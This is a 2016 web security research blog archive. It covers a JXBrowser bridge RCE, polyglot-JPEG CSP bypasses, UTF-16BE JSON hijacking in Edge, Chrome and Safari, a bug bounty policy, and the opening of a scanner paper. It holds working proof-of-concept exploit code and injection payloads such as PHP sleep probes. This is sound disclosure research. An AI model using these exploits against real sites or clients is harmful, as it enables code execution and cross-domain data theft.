Thursday, December 8, 2016

RCE in JXBrowser JavaScript/Java bridge

I recently found myself prototyping an experimental scanning technique using JXBrowser, a library for embedding a PhantomJS-like browser in Java applications. Whilst creating a JavaScript to Java bridge with the JXBrowser library, I wondered if it was possible to achieve remote code execution from a web page attacking the JXBrowser client, by calling classes other than the one I supplied. My JavaScript to Java bridge looked something like this:

browser.addScriptContextListener(new ScriptContextAdapter() {
    public void onScriptContextCreated(ScriptContextEvent event) {
        Browser browser = event.getBrowser();
        JSValue window = browser.executeJavaScriptAndReturnValue("window");
        window.asObject().setProperty("someObj", new someJavaClass());
    }
});

This example was taken from the JXBrowser web site. The code injects a script into the browser instance, retrieves the window object and converts it into a Java JSValue object, then sets "someObj" on the window, passing the Java object to the JavaScript window object, and we have a bridge! The docs said that only public classes could be used. Once we have created a bridge we need some JavaScript to interact with it.

setTimeout(function f(){
    if(window.someObj && typeof window.someObj.javaFunction === 'function') {
      window.someObj.javaFunction("Called Java function from JavaScript");
    } else {
      setTimeout(f, 100); //bridge not ready yet, try again
    }
}, 100);

We have a setTimeout that checks whether we have "someObj"; if not, it calls itself until we do. My first attempt was to use getRuntime() to see if I could get an instance of the runtime object and execute calc. I called:

window.someObj.getClass().forName('java.lang.Runtime').getRuntime();

I got the following error back:
Neither public field nor method named 'getRuntime' exists in the java.lang.Class Java object.

Maybe it wasn’t possible to call getRuntime? I tried something simpler:

window.someObj.getClass().getSuperclass().getName();

This seemed to work. I tried enumerating the methods too.

methods = window.someObj.getClass().getSuperclass().getMethods();
for(i=0;i<methods.length();i++) {
    alert(methods[i]);
}

So I could successfully enumerate the methods. I decided to try ProcessBuilder next and see what would happen. But every time I tried to call the constructor, it failed; it seemed the constructor was expecting a Java array. Somehow I needed to create a Java array of strings so I could pass it to the ProcessBuilder constructor.

window.someObj.getClass().forName("java.lang.ProcessBuilder").newInstance("open","-a Calculator");
//Failed

window.someObj.getClass().forName("java.lang.ProcessBuilder").newInstance(["open","-a Calculator"]);
//Failed too

Leaving this problem for a second, I tried to create another object that would prove this was vulnerable. I could successfully create an instance of the java.net.Socket class:

window.someObj.getClass().forName("java.net.Socket").newInstance();

I tried calling “connect” on this object, but again I had the problem of incorrect argument types. It did prove, however, that I could create socket objects; I couldn’t use them, but I could at least create them. It’s worth noting that I wasn’t passing any arguments for this to work. Next I tried another class, but it failed too. I had no option but to use reflection, yet any time a function expected arguments I couldn’t supply the correct type: newInstance didn’t work and invoke didn’t work.

I needed help; I needed Java expert help. Fortunately, working at PortSwigger you are never the smartest one in the room :) I asked Mike and Patrick for their help, explaining that I needed a Java array in order to pass arguments to a function, and so we began looking for ways to create arrays in our bridge.

Mike thought maybe using an ArrayList was the answer, because we could convert it to an array with its convenient toArray method.

list = window.someObj.getClass().forName("java.util.ArrayList").newInstance(); 
a = list.toArray();

The call threw a NoSuchMethodException stating that the argument we passed was in fact a JSObject. So even though we created an ArrayList, the result of toArray was being converted to a JS object by the bridge, and the incorrect argument type was being sent to ProcessBuilder.

We then tried to create an Array instead. Using reflection again, we called newInstance on java.lang.reflect.Array, but it complained once more about incorrect argument types: we were sending a double but it was expecting an int. Then we tried to create an int using java.lang.Integer, but again we hit the same argument type problem. Patrick thought we could use the MAX_VALUE property and create a huge array :) at least then we'd have our int, but no: the bridge, of course, was converting the integer from Java into a double.

This is what we tried:

window.someObj.getClass().forName("java.lang.Integer").getField("MAX_VALUE").get(null);

But we got a null pointer exception, and calling it without arguments didn't work either. But this is JavaScript, remember: I thought, why not send 123 and see if it gets accepted as an argument? We assumed it wouldn't work, but it did in fact print out our max int. We continued trying to call the Array constructor with our max int value, but of course it failed. Then we decided to look at the Runtime object and see if we could use the same technique. Mike suggested using getDeclaredField to fetch the currentRuntime property, since it was private, and to our great delight we popped the calculator.

field = window.someObj.getClass().forName('java.lang.Runtime').getDeclaredField("currentRuntime");
runtime = field.get(123);
runtime.exec("open -a Calculator");

This meant any website rendered in JXBrowser by code employing the JavaScript-Java bridge could potentially take complete control of the client.

We privately reported this issue to TeamDev (the makers of JXBrowser), and they released a patch to support a whitelist of allowed properties/methods using the @JSAccessible annotation. Note that if an application doesn't use the @JSAccessible annotation anywhere the whitelist won't be enforced, and the exploit above will still work.

Enjoy - @garethheyes

Thursday, December 1, 2016

Bypassing CSP using polyglot JPEGs

James challenged me to see if it was possible to create a polyglot JavaScript/JPEG. Doing so would allow me to bypass CSP on almost any website that hosts user-uploaded images on the same domain. I gleefully took up the challenge and began dissecting the format. The first four bytes, 0xFF 0xD8 0xFF 0xE0, are a valid non-ASCII JavaScript variable. The next two bytes specify the length of the JPEG header. If we make that length 0x2F2A, using the bytes 0x2F 0x2A, then as you might guess we have a non-ASCII variable followed by the start of a multi-line JavaScript comment. We then have to pad out the JPEG header to a length of 0x2F2A with nulls. Here's what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....
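The length arithmetic can be sanity-checked with a short Node sketch (the byte values are taken straight from the dump above; nothing else is assumed):

```javascript
// The polyglot's first six bytes: the JPEG SOI marker (FF D8) and APP0
// marker (FF E0) double as a non-ASCII JavaScript identifier, and the
// two-byte segment length is chosen to spell "/*".
const header = Buffer.from([0xFF, 0xD8, 0xFF, 0xE0, 0x2F, 0x2A]);

// JPEG segment lengths are big-endian, so picking the bytes 0x2F 0x2A
// means the header segment claims to be 0x2F2A bytes long.
const segmentLength = header.readUInt16BE(4);
console.log(segmentLength);                       // 12074
console.log(header.slice(4).toString('latin1'));  // "/*"
```

That 12074-byte segment is exactly the null padding the text describes.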

Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

0xFF 0xFE is the comment marker, 0x00 0x1C specifies the length of the comment, and the rest is our JavaScript payload, which is of course */=alert("Burp rocks.");/*
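The comment segment's length byte can be verified the same way (a sketch; the payload string is the one from the hex dump above):

```javascript
// The JavaScript payload carried inside the JPEG comment segment.
const payload = '*/=alert("Burp rocks.");/*';

// A JPEG comment segment's length field covers the two length bytes
// themselves plus the payload, hence payload length + 2.
const lengthField = payload.length + 2;
console.log(payload.length);                  // 26
console.log('0x' + lengthField.toString(16)); // 0x1c
```

This matches the 0x00 0x1C in the dump.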

Next we need to close the JavaScript comment, I edited the last four bytes of the image data before the end of image marker. Here's what the end of the file looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker. Great, so there is our polyglot JPEG. Well, not quite yet: it works great if you don't specify a charset, but on Firefox, when the document uses a UTF-8 character set, it corrupts our polyglot when included as a script! MDN doesn't state that the script element supports the charset attribute, but it does. So to get the script to work you need to specify the ISO-8859-1 charset on the script tag, and then it executes fine.

It's worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

Here is the polyglot JPEG:
Polyglot JPEG
The code to execute the image as JavaScript is as follows:
<script charset="ISO-8859-1" src=""></script>

File size restrictions 

I attempted to upload this graphic as a phpBB profile picture, but phpBB has restrictions in place: a 6k file size limit and maximum dimensions of 90x90. I reduced the size of the logo by cropping and then thought about how to shrink the JPEG data. In the JPEG header I use /*, which in hex is 0x2F and 0x2A; combined as a length, 0x2F2A is 12074, which demands a lot of padding and results in a graphic far too big for a profile picture. Looking at the ASCII table, I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header, whilst still being recognised as a valid JPEG file.

The smallest starting byte I could find was 0x09 (a tab character) followed by 0x3A (a colon), which gives a combined length of 0x093A (2362). That shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash (0x2F) instead of the NULL character at the end of the JFIF identifier, and an asterisk as the version number. Here's what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A
Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A
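The saving from the new length bytes is easy to confirm (a sketch comparing the two header lengths quoted above):

```javascript
// Padding implied by the two header length choices:
// "/*" (0x2F 0x2A) versus tab + ":" (0x09 0x3A).
const originalLength = 0x2F2A; // '/' then '*'
const smallerLength  = 0x093A; // tab then ':'

console.log(originalLength);                  // 12074
console.log(smallerLength);                   // 2362
console.log(originalLength - smallerLength);  // 9712 bytes saved
```

A 2362-byte header leaves plenty of room under phpBB's 6k limit.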

Here is the smaller graphic:
Polyglot JPEG smaller


If you allow users to upload JPEGs, those uploads live on the same domain as your app, and your CSP allows script from "self", then you can bypass the CSP with a polyglot JPEG: inject a script element and point its src at the uploaded image.


In conclusion, if you allow JPEG uploads on your site, or indeed uploads of any type of file, it's worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there, and remove all JPEG comments. Obviously it's also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn't be possible without the excellent work of Ange Albertini; I used his JPEG format graphic extensively to create the polyglot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.



Mozilla are fixing this in Firefox 51

Enjoy - @garethheyes

Wednesday, November 30, 2016

PortSwigger bug bounty program

Today we are pleased to announce our bug bounty program.
The program is managed on HackerOne, and all reports should be submitted through that platform.

Full details of the program policy are reproduced below. Please read the policy carefully and in full before carrying out any testing or submitting any reports.


Subdomains are strictly out of scope. Do not test these.

If you wish to test the Burp Collaborator functionality, please configure your own private Collaborator server and test that.

Vulnerabilities of interest

Here are some examples of vulnerabilities that we could consider to be valid, and rough guidelines as to what kind of payout you can expect:

Critical - $5000

  • SQL injection on
  • Remotely retrieving other users' Burp Collaborator interactions

High - $3000

  • Stored XSS on
  • File path traversal on
  • Complete authentication bypass on
  • A website accessed through Burp Suite can make Burp execute arbitrary code

Medium - $1000

  • A website accessed through Burp Suite can retrieve local files from the user's system
  • A website accessed through Burp Suite can extract data from Burp's sitemap
  • Exploitable reflected XSS on
  • CSRF on significant actions

Any medium severity issue involving unlikely user interaction - $350

  • Reflected XSS that is unexploitable due to CSP
  • A website scanned using Burp Suite can inject JavaScript into reports exported from the scanner as HTML
  • DLL hijacking on the Burp Suite installer, on fully patched Windows 7/8.1/10

Issues not of interest

The following are strictly forbidden and may result in you being barred from the program, the website, or both:
  • Denial of service attacks
  • Physical or social engineering attempts
  • Targeting subdomains of
  • Bruteforcing subdomains
  • Spamming orders
  • Unthrottled automated scanning - please throttle all tools to one request per second.

We are not interested in low severity, purely theoretical, and best-practice issues. Here are some examples:
    • Denial of service vulnerabilities
    • Headers like Server/X-Powered-By disclosing version information
    • XSS issues in non-current browsers
    • window.opener related issues
    • Unvalidated reports from automated vulnerability scanners
    • CSRF with minimal security implications (logout, etc.)
    • Issues related to email spoofing (eg SPF/DMARC)
    • DNS issues
    • Content spoofing
    • Reports that state that software is out of date or vulnerable without a proof of concept
    • Missing autocomplete attributes
    • Missing cookie flags on non-security sensitive cookies
    • SSL/TLS scan reports (this means output from sites such as SSL Labs)
    • Caching issues
    • Concurrent sessions
    • HPKP / HSTS preloading
    • Implausible bruteforce attacks
There are a few known issues we consider to be low severity, but may fix eventually:
  • As customer numbers are emailed out in plaintext, users should be encouraged to regenerate them on first login.
  • Generating a new customer number should kill all associated sessions.
  • Invoices, quotations, and receipts can be accessed by anyone who is given the link. This is an intentional design decision to enable sharing (the ability to view someone's invoice without being given the link would be considered a serious vulnerability).

Some other caveats:
  • The PayPal price can be tampered with, but underpayment will result in product non-delivery, so this isn't a security issue.
  • We use Content-Security-Policy (CSP) site-wide. This means you will have a hard time doing alert(1). To maximize your payout, see if you can make a payload that will steal some sensitive information.
  • As the makers of Burp Suite, we can assure you that we have already scanned our website with it. Don't waste your bandwidth.
  • Extensions, including those in the BApp Store, are out of scope.

What constitutes a vulnerability in Burp Suite?

The system that Burp Suite runs on is trusted, and every system that can access the Proxy listener is trusted to access the data within Burp. Extensions, configuration files, and project files are also trusted. Websites accessed through Burp are untrusted, so anything a website could do to read files off the user's computer, read data out of Burp Suite, or gain remote code execution would be considered a vulnerability. Any way to obtain someone else's Collaborator interactions would also be considered a vulnerability. Burp doesn't enforce upstream SSL trust by design, so we're not currently concerned about issues (such as weak SSL ciphers) that would be considered a vulnerability in a web browser. Detection of Burp usage, denial of service vulnerabilities, and license enforcement/obfuscation issues are all out of scope. Please refer to the payout guidelines for some example vulnerabilities.

If you have any questions, you can contact us at

Good luck and have fun!

Friday, November 25, 2016

JSON hijacking for the modern web

Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be well patched in Firefox; however, I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__, they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__, like so:

Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
    has:function(target,name){
        alert(name);
    }
}));
<script src="external-script-with-undefined-variable"></script>
<!-- script contains: stealme -->
Edge PoC stealing undefined variable

If you include a cross domain script with stealme in, you will see it alerts the value even though it's an undefined variable.

After further testing I found you can achieve the same thing by overwriting __proto__.__proto__, which is [object EventTargetPrototype] on Edge.

__proto__.__proto__=new Proxy(__proto__,{
    has:function(target,name){
        alert(name);
    }
});
<script src="external-script-with-undefined-variable"></script>

Edge PoC stealing undefined variable method 2

Great, so we can steal data cross-domain, but what else can we do? All major browsers support the charset attribute on script elements, and I found the UTF-16BE charset particularly interesting. UTF-16BE is a multi-byte charset, so two bytes actually form one character. If, for example, your script starts with [", this will be treated as the character 0x5b22, not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going?
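The byte pairing is easy to demonstrate in Node (a minimal sketch; only the two ASCII bytes from the example above are involved):

```javascript
// Reading the ASCII bytes for '[' (0x5B) and '"' (0x22) as UTF-16BE fuses
// them into the single code unit 0x5B22.
const bytes = Buffer.from('["', 'latin1');
const codeUnit = (bytes[0] << 8) | bytes[1];

console.log(codeUnit.toString(16));          // "5b22"
console.log(String.fromCharCode(codeUnit));  // one CJK-range character
```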

Let's say we have a response from the web server that returns an array literal, part of which we control. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above. The only caveat is that the resulting characters, when combined, must form a valid JavaScript variable.

For example let's take a look at the following response:

["supersecret","input here"]

To steal supersecret we need to inject a NULL character followed by two a's; for some reason Edge doesn't treat the response as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing, or maybe it's truncating the response and the characters after the NULL are not a valid JS variable on Edge. I'm not sure, but in my tests it seems to require a NULL padded out with some characters. See below for an example:

<!doctype HTML>
<script>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
    has:function(target,name){
        alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
    }
}));
</script>
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->

Edge PoC stealing JSON feeds

So we proxy the __proto__ property as before, include the script with a UTF-16BE charset, and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by shifting right by 8 to obtain the first byte and using a bitwise AND with 0xFF to obtain the second byte. The result is an alert popup of ["supersecret",", so as you can see Edge seems to truncate the response after the NULL. Note this attack is fairly limited, because many character combinations do not produce a valid JavaScript variable. It may still be useful for stealing small amounts of data.
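The decode step can be pulled out into a standalone helper (a sketch of the same replace() used in the PoC, runnable in Node):

```javascript
// Undo the UTF-16BE fusing: split each code unit back into its high and
// low bytes, recovering the original ASCII.
function utf16beDecode(s) {
  return s.replace(/[\s\S]/g, function (c) {
    c = c.charCodeAt(0);
    return String.fromCharCode(c >> 8, c & 0xff);
  });
}

console.log(utf16beDecode(String.fromCharCode(0x5b22))); // '["'
console.log(utf16beDecode(String.fromCharCode(0x7375))); // 'su'
```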

Stealing JSON feeds in Chrome

It gets worse. Chrome is far more liberal with scripts that have an exotic charset: you don't need to control any of the response for Chrome to use the charset. The only requirement is, as before, that the characters combined together produce a valid JavaScript variable. In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to prevent overwriting __proto__, however they forgot how deep the __proto__ goes...

__proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
    has:function f(target,name){
        var str = f.caller.toString();
        alert(str.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
    }
});
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","abc"] -->
NOTE: This was fixed in Chrome 54
Chrome PoC stealing JSON feeds works in version 53

We go five levels deep down the __proto__ chain and overwrite it with our proxy. What happens next is interesting: although the name argument doesn't contain our undefined variable, the caller of our function does! It returns a function whose name is our variable, obviously encoded in UTF-16BE. It looks like this:

function 嬢獵灥牳散牥琢Ⱒ慢挢崊
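To see why the name looks like that, we can fuse and split the bytes ourselves: a sketch of the encoding the browser applies to the feed and the decode used in the PoC, checked as a round trip:

```javascript
// Fuse pairs of bytes into UTF-16BE code units (what the browser does to
// the feed when the script charset is UTF-16BE).
function utf16beEncode(s) {
  var out = '';
  for (var i = 0; i < s.length; i += 2) {
    out += String.fromCharCode((s.charCodeAt(i) << 8) | s.charCodeAt(i + 1));
  }
  return out;
}
// Split each code unit back apart (what the PoC's replace() does).
function utf16beDecode(s) {
  return s.replace(/[\s\S]/g, function (c) {
    c = c.charCodeAt(0);
    return String.fromCharCode(c >> 8, c & 0xff);
  });
}

var feed = '["supersecret","abc"]\n'; // an even number of characters
console.log(utf16beEncode(feed));     // a CJK-looking identifier
console.log(utf16beDecode(utf16beEncode(feed)) === feed); // true
```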

Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data, otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returned a different domain (maybe a Chrome extension context). When Adblock Plus was enabled I saw some extension code using this method, but I was unable to exploit it since it appeared to be just code injecting into the current document.

In my tests I was also able to include xml or HTML data cross domain even with text/html content type which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome.

Stealing JSON feeds in Safari

We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller.

__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
    has:function f(target,name){
        alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
    }
});

Safari PoC stealing JSON feeds

After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__.

Hacking JSON feeds without JS proxies

I mentioned that the UTF-16BE charset works in every major browser, so how can you hack JSON feeds without JS proxies? First, you need to control some of the data, and the feed has to be constructed in such a way that it produces a valid JavaScript variable. Getting the part of the JSON feed before your injected data is pretty easy: you output a UTF-16BE encoded string that assigns the non-ASCII variable a specific value, then loop through the window object; if a property has this value, its name will contain all of the JSON feed before your injection. The code looks like this:

=1337;for(i in window)if(window[i]===1337)alert(i)

This code is then encoded as a UTF-16BE string so we actually get the code instead of a non-ASCII variable; in effect this means padding each character with a NULL. To get the characters after the injected string I simply use the increment operator, making the encoded string that follows a property of window. Then we call setTimeout and loop through the window again, this time checking for NaN, which will have a variable name of our encoded string. See below:

setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}catch(e){}}});++window.a

I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. The whole JSON feed will look like this:

{"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"}

Hacking JSON feeds without proxies PoC
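The NULL-padding trick described above can be sketched in isolation (a minimal Node sketch; the sample code string is hypothetical):

```javascript
// Pad each character of the ASCII source with a NULL byte so that, read
// back two bytes at a time as UTF-16BE, the stream yields the original code.
function toUtf16beBytes(src) {
  return src.split('').map(function (c) { return '\0' + c; }).join('');
}

var code = '=1337;';
var wire = toUtf16beBytes(code);
console.log(wire.length); // 12: two bytes on the wire per character

// Reading the bytes back as UTF-16BE recovers the source:
var decoded = '';
for (var i = 0; i < wire.length; i += 2) {
  decoded += String.fromCharCode((wire.charCodeAt(i) << 8) | wire.charCodeAt(i + 1));
}
console.log(decoded === code); // true
```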

Bypassing CSP

As you might have noticed, a UTF-16BE converted string will also convert new lines to non-ASCII variables, which gives it the potential to bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that points at the page itself, carrying an encoded assignment and payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference the same domain (which is the majority of policies).

The HTML document will have to look like this:

<!doctype HTML><html>
<?php echo $_GET['x']; ?>

Notice there is no new line after the doctype; the HTML is constructed in such a way that it is valid JavaScript. The characters after the injection don't matter, because we inject a trailing single-line JavaScript comment, and the new lines are converted too. Note that there is no charset declared in the document; this isn't because the charset matters, it's because the quotes and attributes of a meta element would break the JavaScript. The payload looks like this (note that the tab is required in order to construct a valid variable):


Note: This has been patched in later versions of PHP, which default to the UTF-8 charset for the text/html content type and therefore prevent the attack. However, I've simply added a blank charset to the JSON response so it still works on the lab.

CSP bypass using UTF-16BE PoC

Other charsets

I fuzzed every browser and charset. Edge was pretty useless to fuzz because, as mentioned previously, it does some sort of charset sniffing, and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating, especially because the dev tools let you filter console results with a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable, but it is even more brittle than UTF-16BE. Still, I managed to get the following XML to import correctly in Chrome.

<root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window[i]) && typeof window[i]===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root>

The above no longer works in Chrome but I've included it as another example.

UTF-16 and UTF-16LE looked useful too, since the output of the script looked like a JavaScript variable, but they caused invalid syntax errors when including a doctype, XML, or a JSON string. Safari had a few interesting results too, but in my tests I couldn't get it to produce valid JavaScript. It might be worth exploring further, but it will be difficult to fuzz, since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively.


You might think this technique could be applied to CSS, and in theory it should, since any HTML will be converted into a non-ASCII invalid CSS selector. In reality, though, browsers seem to look at the document for a doctype before parsing the CSS with the selected charset, and then ignore the stylesheet, making a self-injected stylesheet fail. Edge, Firefox and IE in standards mode also seem to check the MIME type; Chrome claims the stylesheet was interpreted, but at least in my tests it didn't seem that way.


The charset attacks can be prevented by declaring your charset, such as UTF-8, in an HTTP Content-Type header. PHP 5.6 also prevents these attacks by declaring a UTF-8 charset if none is set in the Content-Type header.


Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response.


I presented this topic at OWASP London and Manchester. You can find the talk and slides below:

OWASP London talk
Slides from OWASP London talk

Update 2...

After discussing stealing multiple undefined variables with @1lastBr3ath, he gave me a link to Takeshi Terada's paper, which has a code sample that works in earlier, since-patched versions of Firefox. The code sample showed it's possible to steal multiple undefined variables using a get trap: the get trap makes all undefined variables defined with a value, and therefore allows you to steal the data. Google and Apple have patched this issue; however, it still works on Edge.

The code looks like this:

__proto__.__proto__ = new Proxy(__proto__,{
    has: function(target,name){
        alert(name);
        return true;
    },
    get: function(){ return 1 }//get trap makes all undefined variables defined
});
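The effect of the get trap can be reproduced in plain Node, with a proxy on an ordinary object's prototype chain standing in for the page's __proto__ (a sketch; no browser globals involved):

```javascript
// A proxy with permissive has/get traps on the prototype chain makes every
// otherwise-undefined property lookup come back defined.
const leaky = {};
Object.setPrototypeOf(leaky, new Proxy({}, {
  has: function (target, name) { return true; }, // claim every name exists
  get: function (target, name) { return 1; }     // ...and give it a value
}));

console.log(leaky.someUndeclaredProperty); // 1, not undefined
```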


Enjoy - @garethheyes

Friday, November 4, 2016

Backslash Powered Scanning: Hunting Unknown Vulnerability Classes


Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.

True to its heritage, this approach also manages to harness some pitfalls that will be all too familiar to experienced manual testers. I'll share some of the more entertaining findings and lessons learned from unleashing this prototype on a few thousand sites, and release a purpose-built stealthy-scanning toolkit. Finally, I'll show how it can be taken far beyond injection hunting, leaving you with numerous leads for future research.

You may prefer to watch the recording.



Outside marketing brochures, web application scanners are widely regarded as only being fit for identifying 'low-hanging fruit' - vulnerabilities that are obvious and easily found by just about anyone. This is often a fair judgement; in comparison with manual testers, automated scanners' reliance on canned technology-specific payloads and innate lack of adaptability means even the most advanced scanners can fail to identify vulnerabilities obvious to a human. In some cases it's unfair - scanners are increasingly good at detecting client-side issues like Cross-Site Scripting, even identifying DOM-based XSS using both static and dynamic analysis. However, black-box scanners lack insight into what's happening server-side, so they typically have a harder time with detection of server-side injection vulnerabilities like SQL injection, Code Injection, and OS Command Injection.

In this paper, I'll break down the three core blind spots in scanners' detection of server-side injection vulnerabilities, then show that by implementing an approach to scanning evolved from classic manual techniques, I was able to develop an open-source scanner capable of detecting research-grade vulnerabilities far above low-hanging fruit. In particular, I will show that this scanner could have found Server-Side Template Injection (SSTI) vulnerabilities prior to the vulnerability class being discovered.

This scanner can be installed as a Burp Suite extension via the BApp store, and the source is available on Github: Backslash Powered Scanner, Distribute Damage.

Three Failures of Scanners

Blind Spot 1: Rare Technology

Security through obscurity works against scanners. As an illustration, I'll look at SSTI, a vulnerability that arises when an application unsafely embeds user input into a template. Depending on the template engine in use, it may be possible to exploit this to gain arbitrary code execution and complete control of the server. In order for a scanner to detect this vulnerability, it needs to be hard coded with a payload for each template engine. If your application is using a popular template engine like FreeMarker or Jinja, that's fine. But how many of the following template engines does your scanner support?

Amber, Apache Velocity, action4JAVA, ASP.NET (Microsoft), ASP.NET (Mono), AutoGen, Beard, Blade, Blitz, Casper, CheetahTemplate, Chip Template Engine, Chunk Templates, CL-EMB, CodeCharge Studio, ColdFusion, Cottle, csharptemplates, CTPP, dbPager, Dermis, Django, DTL::Fast (port of Django templates), Djolt-objc, Dwoo, Dylan Server Pages, ECT, eRuby, FigDice, FreeMarker, Genshi (templating language), Go templates, Google-ctemplate, Grantlee Template System, GvTags, H2o, HAH, Haml, Hamlets, Handlebars, Hyperkit PHP/XML Template Engine, Histone template Engine, HTML-TEMPLATE, HTTL, Jade, JavaServer Pages, jin-template, Jinja, Jinja2, JScore, Kalahari, Kid (templating language), Liquid, Lofn, Lucee, Mako, Mars-Templater, MiniTemplator, mTemplate, Mustache, nTPL, Open Power Template, Obyx, Pebble, Outline, pHAML, PHP, PURE Unobtrusive Rendering Engine, pyratemp, QueryTemplates, RainTPL, Razor, Rythm, Scalate, Scurvy, Simphple, Smarty, StampTE, StringTemplate, SUIT Framework, Template Attribute Language, Twital, Template Blocks, Template Toolkit, Thymeleaf, TinyButStrong, Tonic, Toupl, Twig, Twirl, uBook Template, vlibTemplate, WebMacro, ZeniTPL, BabaJS, Rage, PlannerFw, Fenom
This list only includes the template engines well known enough to be recorded on Wikipedia. Michael Stepankin recently found a remote code execution vulnerability in Paypal stemming from SSTI in Dust.js, a templating engine by LinkedIn conspicuously missing from the above list. Lack of scanner coverage applies equally to anyone using the myriad obscure database languages out there, not to mention frameworks that distort code injection beyond comprehension.

Furthermore, scanners are forced to make assumptions about backend technology stacks, which means changes to one server-side component can break the detection of unrelated vulnerabilities. For example, running a webapp under SELinux can prevent detection of Local File Include and External Entity Include vulnerabilities, since these are typically detected by reading the contents of /etc/passwd, an action SELinux may block.

If obscure vulnerabilities weren't a real blind spot, scanner vendors would be regularly releasing juicy vulnerability classes like SSTI, rather than them going unnoticed for years. Applications with obscure vulnerabilities are absolutely being scanned - during the early stages of my SSTI research, while the issue was unpublished, a client of ours informed us that Burp Suite was reporting a false-positive XSS vulnerability on their site. When I investigated the site myself, it quickly became apparent that the 'false positive' was caused by a significantly more serious SSTI vulnerability.

Ultimately, scanners have seriously degraded performance on applications using the long tail of obscure technologies.

Blind Spot 2: Variants and Filters

Consider a classic vulnerability in a well known language: blind code injection in PHP, inside a double-quoted string. A scanner can easily detect this by sending a payload to induce a time-delay:
".sleep(10)."
So far so good. But if the application happens to filter out parentheses, we'll get a false negative, although the application could still be exploited using
".`sleep 10`."
And if there's a Web Application Firewall (WAF) looking for payloads containing the word 'sleep', we'll almost certainly get a false negative again. Provided the application is normalising input, we can probably still exploit it by using the Cyrillic 'е' character in the hope that it gets normalised into 'e':
".slеep(10)."
And if the application is filtering double-quotes? Once again, we'll get a false negative, when the application is still easily exploitable:
{${sleep(10)}}
Of these three examples, I've encountered two personally during pentests and seen the third in a writeup by someone else.

